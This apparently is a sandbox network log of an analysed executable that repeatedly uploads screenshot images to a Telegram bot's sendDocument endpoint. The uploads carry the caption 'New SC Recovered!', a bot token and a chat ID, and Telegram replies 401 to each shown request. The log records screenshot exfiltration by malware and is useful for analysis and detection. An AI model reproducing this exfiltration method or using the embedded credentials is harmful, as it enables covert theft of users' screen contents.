2024-07-25 22:02:41 UTC	50	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 30 34 31 62 65 38 37 63 37 30 36 2d 2d 0d 0a Data Ascii: -----------------------------8dd0041be87c706--
2024-07-25 22:02:41 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 25 Jul 2024 22:02:41 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.6	49750	149.154.167.220	443	5020	C:\Users\user\Desktop\LisectAVT_2403002A_127.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-25 22:02:49 UTC	262	OUT	POST /bot6240128422:AAGfewUxVcQqKio_MV181yAuk31JpsBcgy8/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd077b581d181a Host: api.telegram.org Content-Length: 57558 Expect: 100-continue Connection: Keep-Alive
2024-07-25 22:02:49 UTC	25	IN	HTTP/1.1 100 Continue
2024-07-25 22:02:49 UTC	1024	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 37 37 62 35 38 31 64 31 38 31 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 33 39 34 35 35 30 32 34 36 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 37 37 62 35 38 31 64 31 38 31 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 31 31 2f 31 38 2f 32 30 32 34 20 30 32 3a 34 37 3a 32 39 0a 55 73 65 72 Data Ascii: -----------------------------8dd077b581d181aContent-Disposition: form-data; name="chat_id"1394550246-----------------------------8dd077b581d181aContent-Disposition: form-data; name="caption"New SC Recovered!Time: 11/18/2024 02:47:29User
2024-07-25 22:02:49 UTC	16355	OUT	Data Raw: 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 73 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFshU9oM4UofORx?"
2024-07-25 22:02:49 UTC	16355	OUT	Data Raw: 4a 5a 4a 00 28 a2 8a 06 14 51 45 00 14 51 45 00 14 51 45 00 25 14 51 40 05 14 51 40 01 a2 8a 28 00 a2 8a 28 18 51 45 14 00 94 52 d2 50 01 45 14 50 01 45 14 53 01 28 a2 8a 06 14 51 45 00 14 51 45 00 14 51 45 00 25 14 b4 94 00 52 52 d1 4c 62 51 45 14 20 0a 28 a2 80 0a 28 a2 80 0a 4a 5a 4a 06 14 51 45 00 14 51 45 30 0a 4a 5a 28 01 28 a5 a4 a0 02 8a 28 a0 61 49 8a 5a 29 80 94 51 45 00 14 51 45 00 14 51 45 03 0a 28 a2 80 0a 4a 5a 4a 60 14 1a 28 a0 02 8a 28 a6 01 49 4b 45 03 12 8a 29 69 80 94 51 45 00 25 14 b4 50 31 77 1f ad 21 0a 7a 8c 7d 28 a2 8b 08 69 8c 1f ba df 9d 34 a3 0e a2 9f 4a 09 1d 0d 16 2a ec 86 92 a7 24 1e a2 9a 51 4f 46 23 eb 40 f9 88 a8 a7 98 d8 76 cf d2 99 41 57 0f ce 8a 3a d2 d0 17 1b c5 18 a5 a4 a7 61 85 18 a3 14 51 60 1b 46 29 d4 94 58 77 1b Data Ascii: JZJ(QEQEQE%Q@Q@((QERPEPES(QEQEQE%RRLbQE ((JZJQEQE0JZ(((aIZ)QEQEQE(JZJ`((IKE)iQE%P1w!z}(i4J*$QOF#@vAW:aQ`F)Xw
2024-07-25 22:02:49 UTC	16355	OUT	Data Raw: 8a 60 25 14 b4 50 02 51 4b 49 40 c2 8a 28 a0 02 93 14 b4 1a 00 4a 4a 5a 29 8c 4a 29 69 28 00 a2 8a 28 00 a4 a5 a2 98 09 4b 8a 28 a0 02 8c 51 45 00 25 2d 14 50 31 29 68 a2 98 85 5e a2 b4 ae bf d7 7e 03 f9 56 6a 8f 98 56 9d d7 fa e3 f4 1f ca b0 9f c4 81 7c 45 7a 29 68 a0 d4 4a 29 68 a0 04 a2 96 8c 50 02 51 4b 45 01 71 28 a5 c5 18 34 5c 2e 26 28 c5 3b 06 97 61 f4 a2 e2 b8 ca 31 4f d8 7b e0 51 f2 8e ac 29 5c 2e 43 3f 16 d2 ff 00 bb fd 6a ad 97 fa d6 fa 55 bb 92 9f 65 94 03 93 8f eb 55 2c b8 95 8e 3b 55 47 66 52 d8 bd 8a 5d a6 93 cd 3d 94 0a 43 2b 7a e3 f0 a9 d4 56 63 c2 1f 4a 5d 84 75 c0 a8 4b b1 ea 4d 25 16 61 ca c9 be 51 d5 c5 1b 90 77 26 a1 a2 9d 83 94 97 cc 51 fc 24 fd 69 0c be 8a 2a 3a 4a 39 50 f9 50 ff 00 35 fd 71 f4 a4 2c c7 ab 13 4d a2 9d 90 ec 2d 14 Data Ascii: `%PQKI@(JJZ)J)i((K(QE%-P1)h^~VjV\|Ez)hJ)hPQKEq(4\.&(;a1O{Q)\.C?jUeU,;UGfR]=C+zVcJ]uKM%aQw&Q$i*:J9PP5q,M-
2024-07-25 22:02:49 UTC	7419	OUT	Data Raw: 31 dc 98 e5 84 7d e1 2b 1c 07 27 b8 3c 00 7b 63 1e e5 41 62 9b fc b6 db b0 c9 9c 8f ba 1b 69 3d 7d 78 aa 9f d9 96 bb 76 88 f1 f4 a5 5d 36 d9 18 30 0d 91 ef 5a d1 a5 52 94 79 53 47 3d 7a f4 6b cb 99 a6 5b 1c 8c d1 48 38 18 a2 ba cf 3c 5a 33 49 45 20 17 34 94 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 4c 02 8a 28 a0 61 45 14 94 80 5a 4a 28 a6 01 45 14 50 01 45 14 50 01 45 14 50 02 51 45 14 0c 28 a2 8a 00 4a 28 a2 80 0a 28 a2 81 85 14 52 50 01 45 14 50 01 45 14 50 30 a4 a2 8a 00 28 a2 8a 00 29 28 a2 80 0a 28 a2 81 89 45 2d 25 00 14 51 49 40 05 14 51 40 c2 8a 29 28 00 a2 8a 28 18 52 52 d2 50 01 45 25 14 0c 28 a2 8a 00 29 28 a2 98 c2 8a 29 28 00 a2 8a 29 00 94 51 45 31 85 25 14 50 30 a4 a5 a4 a0 02 8a 28 a0 61 49 45 14 00 52 52 d2 50 30 a2 8a 28 01 28 Data Ascii: 1}+'<{cAbi=}xv]60ZRySG=zk[H8<Z3IE 4Q@Q@Q@Q@QL(aEZJ(EPEPEPQE(J((RPEPEP0()((E-%QI@Q@)((RRPE%()()()QE1%P0(aIERRP0((
2024-07-25 22:02:49 UTC	50	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 37 37 62 35 38 31 64 31 38 31 61 2d 2d 0d 0a Data Ascii: -----------------------------8dd077b581d181a--
2024-07-25 22:02:50 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 25 Jul 2024 22:02:50 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.6	49751	149.154.167.220	443	5020	C:\Users\user\Desktop\LisectAVT_2403002A_127.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-25 22:02:59 UTC	262	OUT	POST /bot6240128422:AAGfewUxVcQqKio_MV181yAuk31JpsBcgy8/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd0c9d0c344755 Host: api.telegram.org Content-Length: 57558 Expect: 100-continue Connection: Keep-Alive
2024-07-25 22:02:59 UTC	25	IN	HTTP/1.1 100 Continue
2024-07-25 22:02:59 UTC	1024	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 63 39 64 30 63 33 34 34 37 35 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 33 39 34 35 35 30 32 34 36 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 63 39 64 30 63 33 34 34 37 35 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 31 31 2f 32 34 2f 32 30 32 34 20 31 35 3a 33 31 3a 31 35 0a 55 73 65 72 Data Ascii: -----------------------------8dd0c9d0c344755Content-Disposition: form-data; name="chat_id"1394550246-----------------------------8dd0c9d0c344755Content-Disposition: form-data; name="caption"New SC Recovered!Time: 11/24/2024 15:31:15User
2024-07-25 22:02:59 UTC	16355	OUT	Data Raw: 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 73 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFshU9oM4UofORx?"
2024-07-25 22:02:59 UTC	16355	OUT	Data Raw: 4a 5a 4a 00 28 a2 8a 06 14 51 45 00 14 51 45 00 14 51 45 00 25 14 51 40 05 14 51 40 01 a2 8a 28 00 a2 8a 28 18 51 45 14 00 94 52 d2 50 01 45 14 50 01 45 14 53 01 28 a2 8a 06 14 51 45 00 14 51 45 00 14 51 45 00 25 14 b4 94 00 52 52 d1 4c 62 51 45 14 20 0a 28 a2 80 0a 28 a2 80 0a 4a 5a 4a 06 14 51 45 00 14 51 45 30 0a 4a 5a 28 01 28 a5 a4 a0 02 8a 28 a0 61 49 8a 5a 29 80 94 51 45 00 14 51 45 00 14 51 45 03 0a 28 a2 80 0a 4a 5a 4a 60 14 1a 28 a0 02 8a 28 a6 01 49 4b 45 03 12 8a 29 69 80 94 51 45 00 25 14 b4 50 31 77 1f ad 21 0a 7a 8c 7d 28 a2 8b 08 69 8c 1f ba df 9d 34 a3 0e a2 9f 4a 09 1d 0d 16 2a ec 86 92 a7 24 1e a2 9a 51 4f 46 23 eb 40 f9 88 a8 a7 98 d8 76 cf d2 99 41 57 0f ce 8a 3a d2 d0 17 1b c5 18 a5 a4 a7 61 85 18 a3 14 51 60 1b 46 29 d4 94 58 77 1b Data Ascii: JZJ(QEQEQE%Q@Q@((QERPEPES(QEQEQE%RRLbQE ((JZJQEQE0JZ(((aIZ)QEQEQE(JZJ`((IKE)iQE%P1w!z}(i4J*$QOF#@vAW:aQ`F)Xw
2024-07-25 22:02:59 UTC	16355	OUT	Data Raw: 8a 60 25 14 b4 50 02 51 4b 49 40 c2 8a 28 a0 02 93 14 b4 1a 00 4a 4a 5a 29 8c 4a 29 69 28 00 a2 8a 28 00 a4 a5 a2 98 09 4b 8a 28 a0 02 8c 51 45 00 25 2d 14 50 31 29 68 a2 98 85 5e a2 b4 ae bf d7 7e 03 f9 56 6a 8f 98 56 9d d7 fa e3 f4 1f ca b0 9f c4 81 7c 45 7a 29 68 a0 d4 4a 29 68 a0 04 a2 96 8c 50 02 51 4b 45 01 71 28 a5 c5 18 34 5c 2e 26 28 c5 3b 06 97 61 f4 a2 e2 b8 ca 31 4f d8 7b e0 51 f2 8e ac 29 5c 2e 43 3f 16 d2 ff 00 bb fd 6a ad 97 fa d6 fa 55 bb 92 9f 65 94 03 93 8f eb 55 2c b8 95 8e 3b 55 47 66 52 d8 bd 8a 5d a6 93 cd 3d 94 0a 43 2b 7a e3 f0 a9 d4 56 63 c2 1f 4a 5d 84 75 c0 a8 4b b1 ea 4d 25 16 61 ca c9 be 51 d5 c5 1b 90 77 26 a1 a2 9d 83 94 97 cc 51 fc 24 fd 69 0c be 8a 2a 3a 4a 39 50 f9 50 ff 00 35 fd 71 f4 a4 2c c7 ab 13 4d a2 9d 90 ec 2d 14 Data Ascii: `%PQKI@(JJZ)J)i((K(QE%-P1)h^~VjV\|Ez)hJ)hPQKEq(4\.&(;a1O{Q)\.C?jUeU,;UGfR]=C+zVcJ]uKM%aQw&Q$i*:J9PP5q,M-
2024-07-25 22:02:59 UTC	7419	OUT	Data Raw: 31 dc 98 e5 84 7d e1 2b 1c 07 27 b8 3c 00 7b 63 1e e5 41 62 9b fc b6 db b0 c9 9c 8f ba 1b 69 3d 7d 78 aa 9f d9 96 bb 76 88 f1 f4 a5 5d 36 d9 18 30 0d 91 ef 5a d1 a5 52 94 79 53 47 3d 7a f4 6b cb 99 a6 5b 1c 8c d1 48 38 18 a2 ba cf 3c 5a 33 49 45 20 17 34 94 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 4c 02 8a 28 a0 61 45 14 94 80 5a 4a 28 a6 01 45 14 50 01 45 14 50 01 45 14 50 02 51 45 14 0c 28 a2 8a 00 4a 28 a2 80 0a 28 a2 81 85 14 52 50 01 45 14 50 01 45 14 50 30 a4 a2 8a 00 28 a2 8a 00 29 28 a2 80 0a 28 a2 81 89 45 2d 25 00 14 51 49 40 05 14 51 40 c2 8a 29 28 00 a2 8a 28 18 52 52 d2 50 01 45 25 14 0c 28 a2 8a 00 29 28 a2 98 c2 8a 29 28 00 a2 8a 29 00 94 51 45 31 85 25 14 50 30 a4 a5 a4 a0 02 8a 28 a0 61 49 45 14 00 52 52 d2 50 30 a2 8a 28 01 28 Data Ascii: 1}+'<{cAbi=}xv]60ZRySG=zk[H8<Z3IE 4Q@Q@Q@Q@QL(aEZJ(EPEPEPQE(J((RPEPEP0()((E-%QI@Q@)((RRPE%()()()QE1%P0(aIERRP0((
2024-07-25 22:02:59 UTC	50	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 63 39 64 30 63 33 34 34 37 35 35 2d 2d 0d 0a Data Ascii: -----------------------------8dd0c9d0c344755--
2024-07-25 22:02:59 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 25 Jul 2024 22:02:59 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.6	49752	149.154.167.220	443	5020	C:\Users\user\Desktop\LisectAVT_2403002A_127.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-25 22:03:04 UTC	262	OUT	POST /bot6240128422:AAGfewUxVcQqKio_MV181yAuk31JpsBcgy8/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd1001a144c656 Host: api.telegram.org Content-Length: 57561 Expect: 100-continue Connection: Keep-Alive
2024-07-25 22:03:04 UTC	25	IN	HTTP/1.1 100 Continue
2024-07-25 22:03:04 UTC	1024	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 30 30 31 61 31 34 34 63 36 35 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 33 39 34 35 35 30 32 34 36 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 30 30 31 61 31 34 34 63 36 35 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 31 31 2f 32 38 2f 32 30 32 34 20 32 32 3a 34 38 3a 35 33 0a 55 73 65 72 Data Ascii: -----------------------------8dd1001a144c656Content-Disposition: form-data; name="chat_id"1394550246-----------------------------8dd1001a144c656Content-Disposition: form-data; name="caption"New SC Recovered!Time: 11/28/2024 22:48:53User
2024-07-25 22:03:04 UTC	16355	OUT	Data Raw: 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 73 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFshU9oM4UofORx?"
2024-07-25 22:03:04 UTC	16355	OUT	Data Raw: 4a 5a 4a 00 28 a2 8a 06 14 51 45 00 14 51 45 00 14 51 45 00 25 14 51 40 05 14 51 40 01 a2 8a 28 00 a2 8a 28 18 51 45 14 00 94 52 d2 50 01 45 14 50 01 45 14 53 01 28 a2 8a 06 14 51 45 00 14 51 45 00 14 51 45 00 25 14 b4 94 00 52 52 d1 4c 62 51 45 14 20 0a 28 a2 80 0a 28 a2 80 0a 4a 5a 4a 06 14 51 45 00 14 51 45 30 0a 4a 5a 28 01 28 a5 a4 a0 02 8a 28 a0 61 49 8a 5a 29 80 94 51 45 00 14 51 45 00 14 51 45 03 0a 28 a2 80 0a 4a 5a 4a 60 14 1a 28 a0 02 8a 28 a6 01 49 4b 45 03 12 8a 29 69 80 94 51 45 00 25 14 b4 50 31 77 1f ad 21 0a 7a 8c 7d 28 a2 8b 08 69 8c 1f ba df 9d 34 a3 0e a2 9f 4a 09 1d 0d 16 2a ec 86 92 a7 24 1e a2 9a 51 4f 46 23 eb 40 f9 88 a8 a7 98 d8 76 cf d2 99 41 57 0f ce 8a 3a d2 d0 17 1b c5 18 a5 a4 a7 61 85 18 a3 14 51 60 1b 46 29 d4 94 58 77 1b Data Ascii: JZJ(QEQEQE%Q@Q@((QERPEPES(QEQEQE%RRLbQE ((JZJQEQE0JZ(((aIZ)QEQEQE(JZJ`((IKE)iQE%P1w!z}(i4J*$QOF#@vAW:aQ`F)Xw
2024-07-25 22:03:04 UTC	16355	OUT	Data Raw: 8a 60 25 14 b4 50 02 51 4b 49 40 c2 8a 28 a0 02 93 14 b4 1a 00 4a 4a 5a 29 8c 4a 29 69 28 00 a2 8a 28 00 a4 a5 a2 98 09 4b 8a 28 a0 02 8c 51 45 00 25 2d 14 50 31 29 68 a2 98 85 5e a2 b4 ae bf d7 7e 03 f9 56 6a 8f 98 56 9d d7 fa e3 f4 1f ca b0 9f c4 81 7c 45 7a 29 68 a0 d4 4a 29 68 a0 04 a2 96 8c 50 02 51 4b 45 01 71 28 a5 c5 18 34 5c 2e 26 28 c5 3b 06 97 61 f4 a2 e2 b8 ca 31 4f d8 7b e0 51 f2 8e ac 29 5c 2e 43 3f 16 d2 ff 00 bb fd 6a ad 97 fa d6 fa 55 bb 92 9f 65 94 03 93 8f eb 55 2c b8 95 8e 3b 55 47 66 52 d8 bd 8a 5d a6 93 cd 3d 94 0a 43 2b 7a e3 f0 a9 d4 56 63 c2 1f 4a 5d 84 75 c0 a8 4b b1 ea 4d 25 16 61 ca c9 be 51 d5 c5 1b 90 77 26 a1 a2 9d 83 94 97 cc 51 fc 24 fd 69 0c be 8a 2a 3a 4a 39 50 f9 50 ff 00 35 fd 71 f4 a4 2c c7 ab 13 4d a2 9d 90 ec 2d 14 Data Ascii: `%PQKI@(JJZ)J)i((K(QE%-P1)h^~VjV\|Ez)hJ)hPQKEq(4\.&(;a1O{Q)\.C?jUeU,;UGfR]=C+zVcJ]uKM%aQw&Q$i*:J9PP5q,M-
2024-07-25 22:03:04 UTC	7422	OUT	Data Raw: 31 dc 98 e5 84 7d e1 2b 1c 07 27 b8 3c 00 7b 63 1e e5 41 62 9b fc b6 db b0 c9 9c 8f ba 1b 69 3d 7d 78 aa 9f d9 96 bb 76 88 f1 f4 a5 5d 36 d9 18 30 0d 91 ef 5a d1 a5 52 94 79 53 47 3d 7a f4 6b cb 99 a6 5b 1c 8c d1 48 38 18 a2 ba cf 3c 5a 33 49 45 20 17 34 94 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 4c 02 8a 28 a0 61 45 14 94 80 5a 4a 28 a6 01 45 14 50 01 45 14 50 01 45 14 50 02 51 45 14 0c 28 a2 8a 00 4a 28 a2 80 0a 28 a2 81 85 14 52 50 01 45 14 50 01 45 14 50 30 a4 a2 8a 00 28 a2 8a 00 29 28 a2 80 0a 28 a2 81 89 45 2d 25 00 14 51 49 40 05 14 51 40 c2 8a 29 28 00 a2 8a 28 18 52 52 d2 50 01 45 25 14 0c 28 a2 8a 00 29 28 a2 98 c2 8a 29 28 00 a2 8a 29 00 94 51 45 31 85 25 14 50 30 a4 a5 a4 a0 02 8a 28 a0 61 49 45 14 00 52 52 d2 50 30 a2 8a 28 01 28 Data Ascii: 1}+'<{cAbi=}xv]60ZRySG=zk[H8<Z3IE 4Q@Q@Q@Q@QL(aEZJ(EPEPEPQE(J((RPEPEP0()((E-%QI@Q@)((RRPE%()()()QE1%P0(aIERRP0((
2024-07-25 22:03:04 UTC	50	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 30 30 31 61 31 34 34 63 36 35 36 2d 2d 0d 0a Data Ascii: -----------------------------8dd1001a144c656--
2024-07-25 22:03:04 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 25 Jul 2024 22:03:04 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.6	49753	149.154.167.220	443	5020	C:\Users\user\Desktop\LisectAVT_2403002A_127.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-25 22:03:05 UTC	262	OUT	POST /bot6240128422:AAGfewUxVcQqKio_MV181yAuk31JpsBcgy8/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd1279d3482702 Host: api.telegram.org Content-Length: 60931 Expect: 100-continue Connection: Keep-Alive
2024-07-25 22:03:05 UTC	25	IN	HTTP/1.1 100 Continue
2024-07-25 22:03:05 UTC	1024	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 32 37 39 64 33 34 38 32 37 30 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 33 39 34 35 35 30 32 34 36 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 32 37 39 64 33 34 38 32 37 30 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 31 32 2f 30 32 2f 32 30 32 34 20 30 32 3a 32 34 3a 31 36 0a 55 73 65 72 Data Ascii: -----------------------------8dd1279d3482702Content-Disposition: form-data; name="chat_id"1394550246-----------------------------8dd1279d3482702Content-Disposition: form-data; name="caption"New SC Recovered!Time: 12/02/2024 02:24:16User
